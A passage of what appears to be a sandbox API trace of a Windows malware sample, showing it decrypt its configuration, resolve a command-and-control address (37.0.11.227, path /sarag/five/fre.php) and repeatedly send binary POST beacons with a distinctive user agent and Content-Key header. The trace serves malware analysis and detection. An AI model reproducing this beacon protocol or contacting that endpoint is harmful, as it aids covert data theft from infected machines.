returned 0x690000 [0324.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0324.855] send (s=0xb3c, buf=0x6ad508*, len=242, flags=0) returned 242 [0324.855] send (s=0xb3c, buf=0x6aba40*, len=159, flags=0) returned 159 [0324.856] GetProcessHeap () returned 0x690000 [0324.856] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0324.856] recv (in: s=0xb3c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0324.937] GetProcessHeap () returned 0x690000 [0324.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0324.938] GetProcessHeap () returned 0x690000 [0324.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0324.938] GetProcessHeap () returned 0x690000 [0324.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0324.938] GetProcessHeap () returned 0x690000 [0324.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0324.940] closesocket (s=0xb3c) returned 0 [0324.940] GetProcessHeap () returned 0x690000 [0324.940] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0324.940] GetProcessHeap () returned 0x690000 [0324.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0324.941] GetProcessHeap () returned 0x690000 [0324.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0324.941] GetProcessHeap () returned 0x690000 [0324.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0324.942] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1888) returned 0xb3c [0324.944] Sleep (dwMilliseconds=0xea60) [0324.945] GetProcessHeap () returned 0x690000 [0324.945] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0324.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.947] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0324.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.952] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0324.960] GetProcessHeap () returned 0x690000 [0324.960] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0324.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.962] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0324.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.970] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0324.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.971] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0324.971] GetProcessHeap () returned 0x690000 [0324.972] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0324.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.973] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0324.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.973] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0324.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.974] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0324.974] GetProcessHeap () returned 0x690000 [0324.974] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0324.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.976] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0324.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.977] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0324.978] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.978] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0324.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.979] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0324.983] GetProcessHeap () returned 0x690000 [0324.983] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0324.983] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0324.984] GetProcessHeap () returned 0x690000 [0324.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0324.984] GetProcessHeap () returned 0x690000 [0324.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0324.984] GetProcessHeap () returned 0x690000 [0324.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0324.985] GetProcessHeap () returned 0x690000 [0324.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0324.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.986] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0324.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.993] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0325.000] GetProcessHeap () returned 0x690000 [0325.000] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0325.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.002] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0325.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.003] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0325.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.004] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0325.004] GetProcessHeap () returned 0x690000 [0325.004] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0325.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.006] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0325.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.007] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0325.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.008] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0325.008] GetProcessHeap () returned 0x690000 [0325.008] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0325.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.009] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0325.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.011] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0325.011] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.012] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0325.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.013] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0325.013] GetProcessHeap () returned 0x690000 [0325.013] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0325.013] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0325.013] GetProcessHeap () returned 0x690000 [0325.013] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0325.013] socket (af=2, type=1, protocol=6) returned 0xb40 [0325.013] connect (s=0xb40, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0325.039] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0325.039] GetProcessHeap () returned 0x690000 [0325.039] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0325.039] GetProcessHeap () returned 0x690000 [0325.039] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0325.040] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0325.041] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0325.041] GetProcessHeap () returned 0x690000 [0325.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af500 [0325.041] GetProcessHeap () returned 0x690000 [0325.041] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0325.042] GetProcessHeap () returned 0x690000 [0325.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0325.042] GetProcessHeap () returned 0x690000 [0325.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0325.042] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0325.043] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0325.043] GetProcessHeap () returned 0x690000 [0325.043] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0325.043] GetProcessHeap () returned 0x690000 [0325.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0325.044] send (s=0xb40, buf=0x6ad508*, len=242, flags=0) returned 242 [0325.045] send (s=0xb40, buf=0x6aba40*, len=159, flags=0) returned 159 [0325.045] GetProcessHeap () returned 0x690000 [0325.045] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0325.045] recv (in: s=0xb40, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0325.124] GetProcessHeap () returned 0x690000 [0325.125] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0325.125] GetProcessHeap () returned 0x690000 [0325.125] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0325.126] GetProcessHeap () returned 0x690000 [0325.126] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af500 | out: hHeap=0x690000) returned 1 [0325.126] GetProcessHeap () returned 0x690000 [0325.126] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0325.126] closesocket (s=0xb40) returned 0 [0325.127] GetProcessHeap () returned 0x690000 [0325.127] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0325.127] GetProcessHeap () returned 0x690000 [0325.127] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0325.127] GetProcessHeap () returned 0x690000 [0325.127] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0325.127] GetProcessHeap () returned 0x690000 [0325.128] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0325.128] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x188c) returned 0xb40 [0325.131] Sleep (dwMilliseconds=0xea60) [0325.132] GetProcessHeap () returned 0x690000 [0325.132] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0325.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.134] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0325.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.141] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0325.150] GetProcessHeap () returned 0x690000 [0325.150] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0325.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.151] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0325.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.152] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0325.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.153] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0325.153] GetProcessHeap () returned 0x690000 [0325.154] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0325.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.155] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0325.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.156] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0325.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.157] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0325.157] GetProcessHeap () returned 0x690000 [0325.157] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0325.158] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.158] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0325.159] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.163] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0325.164] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.164] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0325.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.165] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0325.165] GetProcessHeap () returned 0x690000 [0325.165] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0325.165] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0325.165] GetProcessHeap () returned 0x690000 [0325.166] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0325.166] GetProcessHeap () returned 0x690000 [0325.166] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0325.166] GetProcessHeap () returned 0x690000 [0325.166] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0325.166] GetProcessHeap () returned 0x690000 [0325.166] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0325.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.167] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0325.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.173] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0325.180] GetProcessHeap () returned 0x690000 [0325.180] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0325.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.181] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0325.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.182] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0325.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.183] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0325.183] GetProcessHeap () returned 0x690000 [0325.183] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0325.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.185] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0325.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.186] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0325.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.187] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0325.187] GetProcessHeap () returned 0x690000 [0325.187] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0325.196] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.196] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0325.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.198] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0325.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.199] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0325.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.200] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0325.201] GetProcessHeap () returned 0x690000 [0325.201] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0325.201] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0325.201] GetProcessHeap () returned 0x690000 [0325.201] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0325.201] socket (af=2, type=1, protocol=6) returned 0xb44 [0325.201] connect (s=0xb44, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0325.226] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0325.226] GetProcessHeap () returned 0x690000 [0325.226] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0325.226] GetProcessHeap () returned 0x690000 [0325.226] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0325.227] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0325.228] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0325.228] GetProcessHeap () returned 0x690000 [0325.228] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0325.228] GetProcessHeap () returned 0x690000 [0325.228] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0325.228] GetProcessHeap () returned 0x690000 [0325.228] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0325.228] GetProcessHeap () returned 0x690000 [0325.229] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0325.229] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0325.230] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0325.230] GetProcessHeap () returned 0x690000 [0325.230] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0325.230] GetProcessHeap () returned 0x690000 [0325.231] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0325.231] send (s=0xb44, buf=0x6ad508*, len=242, flags=0) returned 242 [0325.232] send (s=0xb44, buf=0x6aba40*, len=159, flags=0) returned 159 [0325.232] GetProcessHeap () returned 0x690000 [0325.232] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0325.232] recv (in: s=0xb44, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0325.298] GetProcessHeap () returned 0x690000 [0325.298] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0325.298] GetProcessHeap () returned 0x690000 [0325.298] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0325.298] GetProcessHeap () returned 0x690000 [0325.299] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0325.299] GetProcessHeap () returned 0x690000 [0325.299] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0325.301] closesocket (s=0xb44) returned 0 [0325.302] GetProcessHeap () returned 0x690000 [0325.302] HeapFree (in: 